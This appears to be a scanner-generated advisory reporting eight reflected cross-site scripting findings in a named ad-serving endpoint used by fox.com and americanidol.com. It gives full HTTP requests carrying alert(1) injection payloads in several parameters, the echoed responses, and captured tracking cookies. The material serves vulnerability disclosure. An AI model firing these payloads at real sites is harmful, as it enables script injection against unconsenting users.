XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 739f4"%3balert(1)//958107e54a8 was submitted in the asid parameter. This input was echoed as 739f4";alert(1)//958107e54a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&asid=-1739f4"%3balert(1)//958107e54a8&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759045.753420735476538500.544603~664977~687378~,1317759038.438724.273825~,1317759023.649564.253944~254114~254701~254705~254706~327790~327796~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759045.28800.0.0,sg141659.1317753567.1317759045.28800.0.4,sg143516.1317753552.1317759045.28800.0.0,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10447
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:10:44 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1739f4";alert(1)//958107e54a8", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b3a7"%3balert(1)//99c8bcfbc0b was submitted in the caid parameter. This input was echoed as 4b3a7";alert(1)//99c8bcfbc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=4b3a7"%3balert(1)//99c8bcfbc0b&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759069.438724.273825~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759069.28800.0.0,sg141659.1317753567.1317759069.28800.0.4,sg143516.1317753552.1317759069.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10173
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:08 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{customId:"4b3a7";alert(1)//99c8bcfbc0b", id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"a
...[SNIP]...

1.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 441f3"%3balert(1)//f9173373918 was submitted in the csid parameter. This input was echoed as 441f3";alert(1)//f9173373918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home441f3"%3balert(1)//f9173373918&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5615
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
dow._fw_slot_urls.length) setTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=-1&ssnw=&csid=idol_home441f3";alert(1)//f9173373918&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, fal
...[SNIP]...

1.4. http://1c6e2.v.fwmrm.net/ad/g/1 [flag parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc08e"%3balert(1)//e62c1b5dde6 was submitted in the flag parameter. This input was echoed as dc08e";alert(1)//e62c1b5dde6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&flag=-ptildc08e"%3balert(1)//e62c1b5dde6&pvrn=649564&csid=idol_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=174x174slot1&w=174&h=174 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209; _sid="b117_5659730864117770987"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317758783.0,20486.1317756298.0,20487.1317753554.0,20661.1317758783.0,^"; _pr="1317758780.438724.273825~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317758783.28800.0.4,sg143516.1317753552.1317758783.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5674
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:23 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...

   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=649564&vprn=&vip=50.23.123.106&vdur=&flag=-ptildc08e";alert(1)//e62c1b5dde6;position=1&;ptgt=s&slid=174x174slot1&envp=g_js&w=174&h=174&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e,
...[SNIP]...

1.5. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82666"%3balert(1)//929ea7ec66e was submitted in the pvrn parameter. This input was echoed as 82666";alert(1)//929ea7ec66e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&pvrn=35583982666"%3balert(1)//929ea7ec66e&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5621
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:13 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
etTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=35583982666";alert(1)//929ea7ec66e&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEven
...[SNIP]...

1.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77dd0'%3balert(1)//c3631c732ca was submitted in the slid parameter. This input was echoed as 77dd0';alert(1)//c3631c732ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot77dd0'%3balert(1)//c3631c732ca&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:14 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
id=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=";
var v = ('ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=').replace(/envp=g_js/, '');
document.write(ct ? '<span id="728x90slot77dd0';alert(1)//c3631c732ca" class="_fwph">
...[SNIP]...

1.7. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ac4b"%3balert(1)//c5398e2c7f1 was submitted in the slid parameter. This input was echoed as 8ac4b";alert(1)//c5398e2c7f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot8ac4b"%3balert(1)//c5398e2c7f1&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:11 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
ot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot8ac4b";alert(1)//c5398e2c7f1&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e, false );
   } else if (window.attachEven
...[SNIP]...

1.8. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb280"%3balert(1)//c49b9d5dfef was submitted in the ssid parameter. This input was echoed as cb280";alert(1)//c49b9d5dfef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766cb280"%3balert(1)//c49b9d5dfef&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
